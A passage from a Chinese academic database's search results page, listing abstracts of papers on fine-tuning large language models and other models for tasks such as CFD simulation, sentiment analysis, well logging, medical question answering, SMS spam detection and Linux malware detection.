期刊文献+
共找到42篇文章
< 1 2 3 >
每页显示 20 50 100
Optimizing Fine-Tuning in Quantized Language Models:An In-Depth Analysis of Key Variables
1
作者 Ao Shen Zhiquan Lai +1 位作者 Dongsheng Li Xiaoyu Hu 《Computers, Materials & Continua》 SCIE EI 2025年第1期307-325,共19页
Large-scale Language Models(LLMs)have achieved significant breakthroughs in Natural Language Processing(NLP),driven by the pre-training and fine-tuning paradigm.While this approach allows models to specialize in speci... Large-scale Language Models(LLMs)have achieved significant breakthroughs in Natural Language Processing(NLP),driven by the pre-training and fine-tuning paradigm.While this approach allows models to specialize in specific tasks with reduced training costs,the substantial memory requirements during fine-tuning present a barrier to broader deployment.Parameter-Efficient Fine-Tuning(PEFT)techniques,such as Low-Rank Adaptation(LoRA),and parameter quantization methods have emerged as solutions to address these challenges by optimizing memory usage and computational efficiency.Among these,QLoRA,which combines PEFT and quantization,has demonstrated notable success in reducing memory footprints during fine-tuning,prompting the development of various QLoRA variants.Despite these advancements,the quantitative impact of key variables on the fine-tuning performance of quantized LLMs remains underexplored.This study presents a comprehensive analysis of these key variables,focusing on their influence across different layer types and depths within LLM architectures.Our investigation uncovers several critical findings:(1)Larger layers,such as MLP layers,can maintain performance despite reductions in adapter rank,while smaller layers,like self-attention layers,aremore sensitive to such changes;(2)The effectiveness of balancing factors depends more on specific values rather than layer type or depth;(3)In quantization-aware fine-tuning,larger layers can effectively utilize smaller adapters,whereas smaller layers struggle to do so.These insights suggest that layer type is a more significant determinant of fine-tuning success than layer depth when optimizing quantized LLMs.Moreover,for the same discount of trainable parameters,reducing the trainable parameters in a larger layer is more effective in preserving fine-tuning accuracy than in a smaller one.This study provides valuable guidance for more efficient fine-tuning strategies and opens avenues for further research into optimizing LLM fine-tuning in resource-constrained environments. 展开更多
关键词 Large-scale Language model Parameter-Efficient fine-tuning parameter quantization key variable trainable parameters experimental analysis
在线阅读 下载PDF
Fine-tuning a large language model for automating computational fluid dynamics simulations
2
作者 Zhehao Dong Zhen Lu Yue Yang 《Theoretical & Applied Mechanics Letters》 2025年第3期219-225,共7页
Configuring computational fluid dynamics(CFD)simulations typically demands extensive domain expertise,limiting broader access.Although large language models(LLMs)have advanced scientific computing,their use in automat... Configuring computational fluid dynamics(CFD)simulations typically demands extensive domain expertise,limiting broader access.Although large language models(LLMs)have advanced scientific computing,their use in automating CFD workflows is underdeveloped.We introduce a novel approach centered on domain-specific LLM adaptation.By fine-tuning Qwen2.5-7B-Instruct on NL2FOAM,our custom dataset of 28,716 natural language-to-OpenFOAM configuration pairs with chain-of-thought(CoT)annotations enables direct translation from natural language descriptions to executable CFD setups.A multi-agent system orchestrates the process,autonomously verifying inputs,generating configurations,running simulations,and correcting errors.Evaluation on a benchmark of 21 diverse flow cases demonstrates state-of-the-art performance,achieving 88.7%solution accuracy and 82.6%first-attempt success rate.This significantly outperforms larger general-purpose models such as Qwen2.5-72B-Instruct,DeepSeek-R1,and Llama3.3-70B-Instruct,while also requiring fewer correction iterations and maintaining high computational efficiency.The results highlight the critical role of domain-specific adaptation in deploying LLM assistants for complex engineering workflows.Our code and fine-tuned model have been deposited at https://github.com/YYgroup/AutoCFD. 展开更多
关键词 Large language models fine-tuning Computational fluid dynamics Automated CFD Multi-agent system
在线阅读 下载PDF
Optimizing Airline Review Sentiment Analysis:A Comparative Analysis of LLaMA and BERT Models through Fine-Tuning and Few-Shot Learning
3
作者 Konstantinos I.Roumeliotis Nikolaos D.Tselikas Dimitrios K.Nasiopoulos 《Computers, Materials & Continua》 2025年第2期2769-2792,共24页
In the rapidly evolving landscape of natural language processing(NLP)and sentiment analysis,improving the accuracy and efficiency of sentiment classification models is crucial.This paper investigates the performance o... In the rapidly evolving landscape of natural language processing(NLP)and sentiment analysis,improving the accuracy and efficiency of sentiment classification models is crucial.This paper investigates the performance of two advanced models,the Large Language Model(LLM)LLaMA model and NLP BERT model,in the context of airline review sentiment analysis.Through fine-tuning,domain adaptation,and the application of few-shot learning,the study addresses the subtleties of sentiment expressions in airline-related text data.Employing predictive modeling and comparative analysis,the research evaluates the effectiveness of Large Language Model Meta AI(LLaMA)and Bidirectional Encoder Representations from Transformers(BERT)in capturing sentiment intricacies.Fine-tuning,including domain adaptation,enhances the models'performance in sentiment classification tasks.Additionally,the study explores the potential of few-shot learning to improve model generalization using minimal annotated data for targeted sentiment analysis.By conducting experiments on a diverse airline review dataset,the research quantifies the impact of fine-tuning,domain adaptation,and few-shot learning on model performance,providing valuable insights for industries aiming to predict recommendations and enhance customer satisfaction through a deeper understanding of sentiment in user-generated content(UGC).This research contributes to refining sentiment analysis models,ultimately fostering improved customer satisfaction in the airline industry. 展开更多
关键词 Sentiment classification review sentiment analysis user-generated content domain adaptation customer satisfaction LLaMA model BERT model airline reviews LLM classification fine-tuning
在线阅读 下载PDF
Classification of Conversational Sentences Using an Ensemble Pre-Trained Language Model with the Fine-Tuned Parameter
4
作者 R.Sujatha K.Nimala 《Computers, Materials & Continua》 SCIE EI 2024年第2期1669-1686,共18页
Sentence classification is the process of categorizing a sentence based on the context of the sentence.Sentence categorization requires more semantic highlights than other tasks,such as dependence parsing,which requir... Sentence classification is the process of categorizing a sentence based on the context of the sentence.Sentence categorization requires more semantic highlights than other tasks,such as dependence parsing,which requires more syntactic elements.Most existing strategies focus on the general semantics of a conversation without involving the context of the sentence,recognizing the progress and comparing impacts.An ensemble pre-trained language model was taken up here to classify the conversation sentences from the conversation corpus.The conversational sentences are classified into four categories:information,question,directive,and commission.These classification label sequences are for analyzing the conversation progress and predicting the pecking order of the conversation.Ensemble of Bidirectional Encoder for Representation of Transformer(BERT),Robustly Optimized BERT pretraining Approach(RoBERTa),Generative Pre-Trained Transformer(GPT),DistilBERT and Generalized Autoregressive Pretraining for Language Understanding(XLNet)models are trained on conversation corpus with hyperparameters.Hyperparameter tuning approach is carried out for better performance on sentence classification.This Ensemble of Pre-trained Language Models with a Hyperparameter Tuning(EPLM-HT)system is trained on an annotated conversation dataset.The proposed approach outperformed compared to the base BERT,GPT,DistilBERT and XLNet transformer models.The proposed ensemble model with the fine-tuned parameters achieved an F1_score of 0.88. 展开更多
关键词 Bidirectional encoder for representation of transformer conversation ensemble model fine-tuning generalized autoregressive pretraining for language understanding generative pre-trained transformer hyperparameter tuning natural language processing robustly optimized BERT pretraining approach sentence classification transformer models
在线阅读 下载PDF
New approach to assess sperm DNA fragmentation dynamics: Fine-tuning mathematical models
5
作者 Isabel Ortiz Jesus Dorado +4 位作者 Jane Morrell Jaime Gosalvez Francisco Crespo Juan M.Jimenez Manuel Hidalgo 《Journal of Animal Science and Biotechnology》 SCIE CAS CSCD 2017年第3期592-600,共9页
Background: Sperm DNA fragmentation(sDF) has been proved to be an important parameter in order to predict in vitro the potential fertility of a semen sample. Colloid centrifugation could be a suitable technique to ... Background: Sperm DNA fragmentation(sDF) has been proved to be an important parameter in order to predict in vitro the potential fertility of a semen sample. Colloid centrifugation could be a suitable technique to select those donkey sperm more resistant to DNA fragmentation after thawing. Previous studies have shown that to elucidate the latent damage of the DNA molecule, sDF should be assessed dynamically, where the rate of fragmentation between treatments indicates how resistant the DNA is to iatrogenic damage. The rate of fragmentation is calculated using the slope of a linear regression equation. However, it has not been studied if s DF dynamics fit this model. The objectives of this study were to evaluate the effect of different after-thawing centrifugation protocols on sperm DNA fragmentation and elucidate the most accurate mathematical model(linear regression, exponential or polynomial) for DNA fragmentation over time in frozen-thawed donkey semen.Results: After submitting post-thaw semen samples to no centrifugation(UDC), sperm washing(SW) or single layer centrifugation(SLC) protocols, sD F values after 6 h of incubation were significantly lower in SLC samples than in SW or UDC.Coefficient of determination(R-2) values were significantly higher for a second order polynomial model than for linear or exponential. The highest values for acceleration of fragmentation(aSDF) were obtained for SW, fol owed by SLC and UDC.Conclusion: SLC after thawing seems to preserve longer DNA longevity in comparison to UDC and SW. Moreover,the fine-tuning of models has shown that sDF dynamics in frozen-thawed donkey semen fit a second order polynomial model, which implies that fragmentation rate is not constant and fragmentation acceleration must be taken into account to elucidate hidden damage in the DNA molecule. 展开更多
关键词 Colloid centrifugation Dynamics fine-tuning Mathematical models Sperm DNA fragmentation
在线阅读 下载PDF
Artificial intelligence large model for logging curve reconstruction
6
作者 CHEN Zhangxing ZHANG Yongan +5 位作者 LI Jian HUI Gang SUN Youzhuang LI Yizheng CHEN Yuntian ZHANG Dongxiao 《Petroleum Exploration and Development》 2025年第3期842-854,共13页
To improve the accuracy and generalization of well logging curve reconstruction,this paper proposes an artificial intelligence large language model“Gaia”and conducts model evaluation experiments.By fine-tuning the p... To improve the accuracy and generalization of well logging curve reconstruction,this paper proposes an artificial intelligence large language model“Gaia”and conducts model evaluation experiments.By fine-tuning the pre-trained large language model,the Gaia significantly improved its ability in extracting sequential patterns and spatial features from well-log curves.Leveraging the adapter method for fine-tuning,this model required training only about 1/70 of its original parameters,greatly improving training efficiency.Comparative experiments,ablation experiments,and generalization experiments were designed and conducted using well-log data from 250 wells.In the comparative experiment,the Gaia model was benchmarked against cutting-edge small deep learning models and conventional large language models,demonstrating that the Gaia model reduced the mean absolute error(MAE)by at least 20%.In the ablation experiments,the synergistic effect of the Gaia model's multiple components was validated,with its MAE being at least 30%lower than that of single-component models.In the generalization experiments,the superior performance of the Gaia model in blind-well predictions was further confirmed.Compared to traditional models,the Gaia model is significantly superior in accuracy and generalization for logging curve reconstruction,fully showcasing the potential of large language models in the field of well-logging.This provides a new approach for future intelligent logging data processing. 展开更多
关键词 logging curve reconstruction large language model ADAPTER pre-trained model fine-tuning method
在线阅读 下载PDF
ExplainableDetector:Exploring transformer-based language modeling approach for SMS spam detection with explainability analysis
7
作者 Mohammad Amaz Uddin Muhammad Nazrul Islam +2 位作者 Leandros Maglaras Helge Janicke Iqbal H.Sarker 《Digital Communications and Networks》 2025年第5期1504-1518,共15页
Short Message Service(SMS)is a widely used and cost-effective communication medium that has unfortunately become a frequent target for unsolicited messages-commonly known as SMS spam.With the rapid adoption of smartph... Short Message Service(SMS)is a widely used and cost-effective communication medium that has unfortunately become a frequent target for unsolicited messages-commonly known as SMS spam.With the rapid adoption of smartphones and increased Internet connectivity,SMS spam has emerged as a prevalent threat.Spammers have recognized the critical role SMS plays in today’s modern communication,making it a prime target for abuse.As cybersecurity threats continue to evolve,the volume of SMS spam has increased substantially in recent years.Moreover,the unstructured format of SMS data creates significant challenges for SMS spam detection,making it more difficult to successfully combat spam attacks.In this paper,we present an optimized and fine-tuned transformer-based Language Model to address the problem of SMS spam detection.We use a benchmark SMS spam dataset to analyze this spam detection model.Additionally,we utilize pre-processing techniques to obtain clean and noise-free data and address class imbalance problem by leveraging text augmentation techniques.The overall experiment showed that our optimized fine-tuned BERT(Bidirectional Encoder Representations from Transformers)variant model RoBERTa obtained high accuracy with 99.84%.To further enhance model transparency,we incorporate Explainable Artificial Intelligence(XAI)techniques that compute positive and negative coefficient scores,offering insight into the model’s decision-making process.Additionally,we evaluate the performance of traditional machine learning models as a baseline for comparison.This comprehensive analysis demonstrates the significant impact language models can have on addressing complex text-based challenges within the cybersecurity landscape. 展开更多
关键词 CYBERSECURITY Machine learning Large language model Spam detection Text analytics Explainable AI fine-tuning TRANSFORMER
在线阅读 下载PDF
Intelligent evaluation of sandstone rock structure based on a visual large model
8
作者 REN Yili ZENG Changmin +10 位作者 LI Xin LIU Xi HU Yanxu SU Qianxiao WANG Xiaoming LIN Zhiwei ZHOU Yixiao ZHENG Zilu HU Huiying YANG Yanning HUI Fang 《Petroleum Exploration and Development》 2025年第2期548-558,共11页
Existing sandstone rock structure evaluation methods rely on visual inspection,with low efficiency,semi-quantitative analysis of roundness,and inability to perform classified statistics in particle size analysis.This ... Existing sandstone rock structure evaluation methods rely on visual inspection,with low efficiency,semi-quantitative analysis of roundness,and inability to perform classified statistics in particle size analysis.This study presents an intelligent evaluation method for sandstone rock structure based on the Segment Anything Model(SAM).By developing a lightweight SAM fine-tuning method with rank-decomposition matrix adapters,a multispectral rock particle segmentation model named CoreSAM is constructed,which achieves rock particle edge extraction and type identification.Building upon this,we propose a comprehensive quantitative evaluation system for rock structure,assessing parameters including particle size,sorting,roundness,particle contact and cementation types.The experimental results demonstrate that CoreSAM outperforms existing methods in rock particle segmentation accuracy while showing excellent generalization across different image types such as CT scans and core photographs.The proposed method enables full-sample,classified particle size analysis and quantitative characterization of parameters like roundness,advancing reservoir evaluation towards more precise,quantitative,intuitive,and comprehensive development. 展开更多
关键词 SANDSTONE rock structure intelligent evaluation Segment Anything model fine-tuning particle edge extraction type identification
在线阅读 下载PDF
TCMLCM:an intelligent question-answering model for traditional Chinese medicine lung cancer based on the KG2TRAG method
9
作者 Chunfang ZHOU Qingyue GONG +2 位作者 Wendong ZHAN Jinyang ZHU Huidan LUAN 《Digital Chinese Medicine》 2025年第1期36-45,共10页
Objective To improve the accuracy and professionalism of question-answering(QA)model in traditional Chinese medicine(TCM)lung cancer by integrating large language models with structured knowledge graphs using the know... Objective To improve the accuracy and professionalism of question-answering(QA)model in traditional Chinese medicine(TCM)lung cancer by integrating large language models with structured knowledge graphs using the knowledge graph(KG)to text-enhanced retrievalaugmented generation(KG2TRAG)method.Methods The TCM lung cancer model(TCMLCM)was constructed by fine-tuning Chat-GLM2-6B on the specialized datasets Tianchi TCM,HuangDi,and ShenNong-TCM-Dataset,as well as a TCM lung cancer KG.The KG2TRAG method was applied to enhance the knowledge retrieval,which can convert KG triples into natural language text via ChatGPT-aided linearization,leveraging large language models(LLMs)for context-aware reasoning.For a comprehensive comparison,MedicalGPT,HuatuoGPT,and BenTsao were selected as the baseline models.Performance was evaluated using bilingual evaluation understudy(BLEU),recall-oriented understudy for gisting evaluation(ROUGE),accuracy,and the domain-specific TCM-LCEval metrics,with validation from TCM oncology experts assessing answer accuracy,professionalism,and usability.Results The TCMLCM model achieved the optimal performance across all metrics,including a BLEU score of 32.15%,ROUGE-L of 59.08%,and an accuracy rate of 79.68%.Notably,in the TCM-LCEval assessment specific to the field of TCM,its performance was 3%−12%higher than that of the baseline model.Expert evaluations highlighted superior performance in accuracy and professionalism.Conclusion TCMLCM can provide an innovative solution for TCM lung cancer QA,demonstrating the feasibility of integrating structured KGs with LLMs.This work advances intelligent TCM healthcare tools and lays a foundation for future AI-driven applications in traditional medicine. 展开更多
关键词 Traditional Chinese medicine(TCM) Lung cancer Question-answering Large language model fine-tuning Knowledge graph KG2TRAG method
暂未订购
Research status and application of artificial intelligence large models in the oil and gas industry 被引量:3
10
作者 LIU He REN Yili +6 位作者 LI Xin DENG Yue WANG Yongtao CAO Qianwen DU Jinyang LIN Zhiwei WANG Wenjie 《Petroleum Exploration and Development》 SCIE 2024年第4期1049-1065,共17页
This article elucidates the concept of large model technology,summarizes the research status of large model technology both domestically and internationally,provides an overview of the application status of large mode... This article elucidates the concept of large model technology,summarizes the research status of large model technology both domestically and internationally,provides an overview of the application status of large models in vertical industries,outlines the challenges and issues confronted in applying large models in the oil and gas sector,and offers prospects for the application of large models in the oil and gas industry.The existing large models can be briefly divided into three categories:large language models,visual large models,and multimodal large models.The application of large models in the oil and gas industry is still in its infancy.Based on open-source large language models,some oil and gas enterprises have released large language model products using methods like fine-tuning and retrieval augmented generation.Scholars have attempted to develop scenario-specific models for oil and gas operations by using visual/multimodal foundation models.A few researchers have constructed pre-trained foundation models for seismic data processing and interpretation,as well as core analysis.The application of large models in the oil and gas industry faces challenges such as current data quantity and quality being difficult to support the training of large models,high research and development costs,and poor algorithm autonomy and control.The application of large models should be guided by the needs of oil and gas business,taking the application of large models as an opportunity to improve data lifecycle management,enhance data governance capabilities,promote the construction of computing power,strengthen the construction of“artificial intelligence+energy”composite teams,and boost the autonomy and control of large model technology. 展开更多
关键词 foundation model large language mode visual large model multimodal large model large model of oil and gas industry pre-training fine-tuning
在线阅读 下载PDF
Rotary-scaling fine-tuning (RSFT) method for optimizing railway wheel profiles and its application to a locomotive 被引量:13
11
作者 Yunguang Ye Yayun Qi +3 位作者 Dachuan Shi Yu Sun Yichang Zhou Markus Hecht 《Railway Engineering Science》 2020年第2期160-183,共24页
The existing multi-objective wheel profile optimization methods mainly consist of three sub-modules:(1)wheel profile generation,(2)multi-body dynamics simulation,and(3)an optimization algorithm.For the first module,a ... The existing multi-objective wheel profile optimization methods mainly consist of three sub-modules:(1)wheel profile generation,(2)multi-body dynamics simulation,and(3)an optimization algorithm.For the first module,a comparably conservative rotary-scaling finetuning(RSFT)method,which introduces two design variables and an empirical formula,is proposed to fine-tune the traditional wheel profiles for improving their engineering applicability.For the second module,for the TRAXX locomotives serving on the Blankenburg–Rubeland line,an optimization function representing the relationship between the wheel profile and the wheel–rail wear number is established based on Kriging surrogate model(KSM).For the third module,a method combining the regression capability of KSM with the iterative computing power of particle swarm optimization(PSO)is proposed to quickly and reliably implement the task of optimizing wheel profiles.Finally,with the RSFT–KSM–PSO method,we propose two wear-resistant wheel profiles for the TRAXX locomotives serving on the Blankenburg–Rubeland line,namely S1002-S and S1002-M.The S1002-S profile minimizes the total wear number by 30%,while the S1002-M profile makes the wear distribution more uniform through a proper sacrifice of the tread wear number,and the total wear number is reduced by 21%.The quasi-static and hunting stability tests further demonstrate that the profile designed by the RSFT–KSM–PSO method is promising for practical engineering applications. 展开更多
关键词 Wheel profile optimization Wear reduction Rotary-scaling fine-tuning Particle swarm optimization Kriging surrogate model
在线阅读 下载PDF
Construction and preliminary application of large language model for reservoir performance analysis
12
作者 PAN Huanquan LIU Jianqiao +13 位作者 GONG Bin ZHU Yiheng BAI Junhui HUANG Hu FANG Zhengbao JING Hongbin LIU Chen KUANG Tie LAN Yubo WANG Tianzhi XIE Tian CHENG Mingzhe QIN Bin SHEN Yujiang 《Petroleum Exploration and Development》 SCIE 2024年第5期1357-1366,共10页
A large language model(LLM)is constructed to address the sophisticated demands of data retrieval and analysis,detailed well profiling,computation of key technical indicators,and the solutions to complex problems in re... A large language model(LLM)is constructed to address the sophisticated demands of data retrieval and analysis,detailed well profiling,computation of key technical indicators,and the solutions to complex problems in reservoir performance analysis(RPA).The LLM is constructed for RPA scenarios with incremental pre-training,fine-tuning,and functional subsystems coupling.Functional subsystem and efficient coupling methods are proposed based on named entity recognition(NER),tool invocation,and Text-to-SQL construction,all aimed at resolving pivotal challenges in developing the specific application of LLMs for RDA.This study conducted a detailed accuracy test on feature extraction models,tool classification models,data retrieval models and analysis recommendation models.The results indicate that these models have demonstrated good performance in various key aspects of reservoir dynamic analysis.The research takes some injection and production well groups in the PK3 Block of the Daqing Oilfield as an example for testing.Testing results show that our model has significant potential and practical value in assisting reservoir engineers with RDA.The research results provide a powerful support to the application of LLM in reservoir performance analysis. 展开更多
关键词 reservoir performance analysis artificial intelligence large model application-specific large language model in-cremental pre-training fine-tuning subsystems coupling entity recognition tool invocation
在线阅读 下载PDF
Key Technologies and Application Prospects of Railway Natural Language Large Model
13
作者 SHI Tianyun LI Xinqin +4 位作者 DAI Mingrui SHI Weifeng LI Guohua DU Wenran SHEN Meiying(Translated) 《Chinese Railways》 2024年第2期11-20,共10页
The emergence of artificial intelligence natural language large models has brought new dawn for the in-depth empowerment of the industry.Research on key technologies and applications of railway natural language large ... The emergence of artificial intelligence natural language large models has brought new dawn for the in-depth empowerment of the industry.Research on key technologies and applications of railway natural language large model is of great significance to promoting and coordinating the development of railway artificial intelligence.This paper puts forward the application scenarios of railway natural language large model according to the application requirements of railway artificial intelligence;designs the overall architecture of the railway natural language large model by relying on the railway artificial intelligence platform,studies the key technologies of the natural language large model,builds a railway industry large model oriented to intelligent question-answering,and verifies the model with actual data;finally,this paper prospects for the development and application of railway natural language large model from the aspects of railway traffic organization,railway operation safety and passenger service. 展开更多
关键词 intelligent HSR artificial intelligence railway natural language large model application scenarios large model architecture large model fine-tuning retrieval-augmented generation railway knowledge question-answering
原文传递
Training and Implementation of Subjective Questions Scoring System Based on the Baidu Qianfan Model Platform
14
作者 Xiaoyun Zhu 《Journal of Contemporary Educational Research》 2024年第11期227-232,共6页
Leveraging the Baidu Qianfan model platform,this paper designs and implements a highly efficient and accurate scoring system for subjective questions,focusing primarily on questions in the field of computer network te... Leveraging the Baidu Qianfan model platform,this paper designs and implements a highly efficient and accurate scoring system for subjective questions,focusing primarily on questions in the field of computer network technology.The system enhances the foundational model by utilizing Qianfan’s training tools and integrating advanced techniques,such as supervised fine-tuning.In the data preparation phase,a comprehensive collection of subjective data related to computer network technology is gathered,cleaned,and labeled.During model training and evaluation,optimal hyperparameters and tuning strategies are applied,resulting in a model capable of scoring with high accuracy.Evaluation results demonstrate that the proposed model performs well across multiple dimensions-content,expression,and development scores-yielding results comparable to those of manual scoring. 展开更多
关键词 Subjective score Natural language processing Deep learning Baidu Qianfan large model platform Supervised fine-tuning model training and evaluation
在线阅读 下载PDF
基于RAG的文物艺术品拍卖数据NL2SQL实现方法
15
作者 李成华 张浏鹏 石鸿凌 《计算机应用》 北大核心 2025年第S2期82-87,共6页
自然语言转换结构化查询语言(NL2SQL)能降低非专业人员操作数据库的技术门槛,从而提升用户体验和工作效率。此外,检索增强生成(RAG)技术可以通过引入外部知识库提升NL2SQL的性能。针对目前RAG在NL2SQL应用中存在的检索策略漏检率高和召... 自然语言转换结构化查询语言(NL2SQL)能降低非专业人员操作数据库的技术门槛,从而提升用户体验和工作效率。此外,检索增强生成(RAG)技术可以通过引入外部知识库提升NL2SQL的性能。针对目前RAG在NL2SQL应用中存在的检索策略漏检率高和召回上下文的相关性不强等问题,提出一种分序检索重排序RAG(RAG-SRR)方法优化知识库构建、检索召回策略和提示词设计等环节。首先,从问答对、专业名词和数据库结构这3个方面进行领域知识库的构建:问答对根据文物艺术品拍卖监管的高频处理和查询的问题构建,专业名词根据拍卖行业标准构建,而数据库结构根据雅昌艺术拍卖网的数据构建;其次,在检索阶段采取分序检索的策略,并对3类知识库设置不同的优先级,且在召回阶段重排序检索的信息;最后,在提示词设计中给出提示词优化设计的原则及提示词模板。实验结果表明:在领域数据集、Spider数据集上,RAG-SRR方法与基于BERT(Bidirectional Encoder Representations from Transformers)模型和RESDSQL(Ranking-enhanced Encoding plus a Skeleton-aware Decoding framework for text-to-SQL)模型的方法的执行准确率分别至少提高了19.50、24.20和12.17、8.90个百分点。而在相同大语言模型下,RAG-SRR方法比未优化的RAG方法的执行准确率分别至少提高了12.83和15.60个百分点,与C3SQL方法相比,执行准确率分别至少提高了1.50和3.10个百分点。在使用Llama3.1-8B时,与DIN-SQL方法相比,执行准确率在中文语料数据集中提升0.30个百分点,在英文语料数据集中最多相差3.90个百分点;但在使用Qwen2.5-7B时,执行准确率分别提高1.60和4.10个百分点。可见,RAG-SRR方法具备较强的实用性和可移植性。 展开更多
关键词 中文自然语言转换结构化查询语言 检索增强生成 大语言模型 重排序 文物艺术品拍卖
在线阅读 下载PDF
基于混合检索重排序策略的大模型增强方法 被引量:1
16
作者 张健 唐晋韬 +1 位作者 王挺 李莎莎 《中文信息学报》 北大核心 2025年第4期42-54,共13页
检索增强生成技术通过提供外部知识帮助大语言模型更准确地回答问题,现有研究表明大语言模型对输入中知识的位置敏感,这为研究输入窗口变长后重排序策略对大语言模型性能的潜在影响提供了动机。该文通过构建检索增强生成系统进行实验验... 检索增强生成技术通过提供外部知识帮助大语言模型更准确地回答问题,现有研究表明大语言模型对输入中知识的位置敏感,这为研究输入窗口变长后重排序策略对大语言模型性能的潜在影响提供了动机。该文通过构建检索增强生成系统进行实验验证,以段落形式而不是固定长度切分存储知识更能提高大语言模型的准确率;同时发现在输入中将检索知识前置于问题时,逆序重排序更能提高大语言模型的准确率,且随着检索知识的数量增加效果会更明显。基于此,该文提出基于混合检索的逆序重排序方法。实验表明,该方法在提升大语言模型的准确率方面,相较于传统语义相似性检索逆序方法,最高实现2.5%的提升;与正序重排序相比,也能实现最高3.2%的提升。 展开更多
关键词 检索增强生成 大语言模型 重排序方法
在线阅读 下载PDF
DiaRAG:面向糖尿病领域的智能问答系统
17
作者 杨涛 欧阳纯萍 +1 位作者 余颖 万亚平 《工程科学学报》 北大核心 2025年第9期1885-1895,共11页
为了满足糖尿病领域对智能问答系统高效性与专业性的双重需求,本文设计并实现了融合知识图谱与检索增强生成(Retrieval augmented generation,RAG)的糖尿病领域智能问答系统--DiaRAG.该系统提出了一种自动提示生成方法(Autoprompt gener... 为了满足糖尿病领域对智能问答系统高效性与专业性的双重需求,本文设计并实现了融合知识图谱与检索增强生成(Retrieval augmented generation,RAG)的糖尿病领域智能问答系统--DiaRAG.该系统提出了一种自动提示生成方法(Autoprompt generation,APG),能够自动生成适用于糖尿病领域的提示模板,用于提取糖尿病知识图谱并构建检索知识库.同时,通过提示学习对病患提出的问句进行校正,有效解决了复杂问句中的语义和语法偏误问题.此外,本文设计了微调排序模型(Fine-tuned reranker),对糖尿病知识图谱的社区摘要进行二次过滤,以确保检索结果与病患提问意图的高度契合.DiaRAG系统通过深度融合知识图谱与大语言模型(Large language model,LLM),充分利用外部知识库,从而显著提升了糖尿病领域知识的问答能力.实验结果表明,DiaRAG在问答准确性、社区摘要相关性等方面均显著优于现有系统,为糖尿病个性化知识服务提供了创新性解决方案. 展开更多
关键词 糖尿病 智能问答系统 知识图谱 检索增强生成 提示工程 微调排序模型
在线阅读 下载PDF
Malware of Dynamic Behavior and Attack Patterns Using ATT&CK Framework
18
作者 Jong-Yih Kuo Ping-Feng Wang +1 位作者 Ti-Feng Hsieh Cheng-Hsuan Kuo 《Computer Modeling in Engineering & Sciences》 2025年第6期3133-3166,共34页
In recent years,cyber threats have escalated across diverse sectors,with cybercrime syndicates increasingly exploiting system vulnerabilities.Traditional passive defense mechanisms have proven insufficient,particularl... In recent years,cyber threats have escalated across diverse sectors,with cybercrime syndicates increasingly exploiting system vulnerabilities.Traditional passive defense mechanisms have proven insufficient,particularly as Linux platforms—historically overlooked in favor of Windows—have emerged as frequent targets.According to Trend Micro,there has been a substantial increase in Linux-targeted malware,with ransomware attacks on Linux surpassing those on macOS.This alarming trend underscores the need for detection strategies specifically designed for Linux environments.To address this challenge,this study proposes a comprehensive malware detection framework tailored for Linux systems,integrating dynamic behavioral analysis with the semantic reasoning capabilities of large language models(LLMs).Malware samples are executed within sandbox environments to extract behavioral features such as system calls and command-line executions.These features are then systematically mapped to the MITRE ATT&CK framework,incorporating its defined data sources,data components,and Tactics,Techniques,and Procedures(TTPs).Two mapping constructs—Conceptual Definition Mapping and TTP Technical Keyword Mapping—are developed from official MITRE documentation.These resources are utilized to fine-tune an LLM,enabling it to semantically interpret complex behavioral patterns and infer associated attack techniques,including those employed by previously unknown malware variants.The resulting detection pipeline effectively bridges raw behavioral data with structured threat intelligence.Experimental evaluations confirm the efficacy of the proposed system,with the fine-tuned Gemma 2B model demonstrating significantly enhanced accuracy in associating behavioral features with ATT&CK-defined techniques.This study contributes a fully integrated Linux-specific detection framework,a novel approach for transforming unstructured behavioral data into actionable intelligence,improved interpretability of malicious behavior,and a scalable training process for future applications of LLMs in cybersecurity. 展开更多
关键词 Linux malware dynamic analysis behavior analysis behavioral feature ATT&CK SANDBOX large language model fine-tuning
在线阅读 下载PDF
Decision-focused fine-tuning of time series foundation models for dispatchable feeder optimization
19
作者 Maximilian Beichter Nils Friederich +7 位作者 Janik Pinter Dorina Werling Kaleb Phipps Sebastian Beichter Oliver Neumann Ralf Mikut Veit Hagenmeyer Benedikt Heidrich 《Energy and AI》 2025年第3期466-479,共14页
Time series foundation models provide a universal solution for generating forecasts to support optimization problems in energy systems.Those foundation models are typically trained in a prediction-focused manner to ma... Time series foundation models provide a universal solution for generating forecasts to support optimization problems in energy systems.Those foundation models are typically trained in a prediction-focused manner to maximize forecast quality.In contrast,decision-focused learning directly improves the resulting value of the forecast in downstream optimization rather than merely maximizing forecasting quality.The practical integration of forecast values into forecasting models is challenging,particularly when addressing complex applications with diverse instances,such as buildings.This becomes even more complicated when instances possess specific characteristics that require instance-specific,tailored predictions to increase the forecast value.To tackle this challenge,we use decision-focused fine-tuning within time series foundation models to offer a scalable and efficient solution for decision-focused learning applied to the dispatchable feeder optimization problem.To obtain more robust predictions for scarce building data,we use Moirai as a state-of-the-art foundation model,which offers robust and generalized results with few-shot parameter-efficient fine-tuning.Comparing the decision-focused fine-tuned Moirai with a state-of-the-art classical prediction-focused fine-tuning Moirai,we observe an improvement of 9.45%in Average Daily Total Costs. 展开更多
关键词 Deep learning Decision-focused learning OPTIMIZATION Dispatchable feeder optimization Time series foundation models Parameter efficient fine-tuning
在线阅读 下载PDF
A Survey on Quality Evaluation of Instruction Fine-tuning Datasets for Large Language Models
20
作者 Yitian Luo Yu Liu +2 位作者 Lu Zhang Feng Gao Jinguang Gu 《Data Intelligence》 2025年第3期527-566,共40页
Instruction fine-tuning is a key method for adapting large language models(LLMs)to domain-specific tasks,and instruction quality significantly impacts model performance after fine-tuning.Hence,evaluating the quality o... Instruction fine-tuning is a key method for adapting large language models(LLMs)to domain-specific tasks,and instruction quality significantly impacts model performance after fine-tuning.Hence,evaluating the quality of instruction and selecting high-quality instructions are essential steps in the process of LLM instruction fine-tuning.Although existing studies provide important theoretical foundations and techniques for this,there is still room for improvement in terms of generality,the relationship between methods and experimental verification.Current methods for evaluating instruction quality can be classified into four main categories:human evaluation,statistics-based evaluation,model-based evaluation,and LLMs-based evaluation.Among these methods,human evaluation relies on the subjective judgment and domain expertise of the evaluators,which offers interpretability and is suitable for scenarios involving small-scale data and sufficient budgets.Statistics-based evaluation estimates the quality of instructions using indicators such as stopwords and lexical diversity,providing high efficiency and a suitable evaluation for large-scale data.Model-based evaluation employs specific models to quantify indicators such as perplexity(PPL)and instruction following difficulty(IFD),which is flexible and suitable for specific tasks.The LLMs-based evaluation rates the quality of instructions through prompt-based interaction with LLMs,focusing on aspects such as accuracy and coherence,which is highly 